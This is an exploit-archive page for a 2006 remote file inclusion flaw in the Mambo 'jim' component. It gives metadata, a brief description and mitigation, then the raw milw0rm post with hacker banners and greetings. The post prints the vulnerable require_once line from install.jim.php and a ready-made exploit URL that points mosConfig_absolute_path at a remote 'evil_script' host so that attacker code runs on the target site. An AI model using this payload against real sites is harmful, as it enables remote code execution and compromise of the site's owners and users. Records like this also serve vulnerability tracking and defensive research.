header-logo
Suggest Exploit
vendor:
jim Component
by:
XORON
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: jim Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mambo jim Component Remote Include Vulnerability

A remote include vulnerability exists in Mambo jim Component. The vulnerability is due to the 'install.jim.php' script not properly sanitizing user-supplied input. This may allow a remote attacker to include a file from a remote host that contains arbitrary code, resulting in a loss of integrity.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected.
Source

Exploit-DB raw data:

############################################################
############################################################
############# C Y B E R - W A R R I O R  T I M #############
############################################################
############################################################

#Mambo jim Component Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  in install.jim.php , line 16

require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");

############################################################

#Exploit:
http://www.site.com/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA, sakkkure, x-mastER, DJR, DaRK, EntriKa, R3D4C!D, iNSoMNiA and all my friend

############################################################

# milw0rm.com [2006-08-17]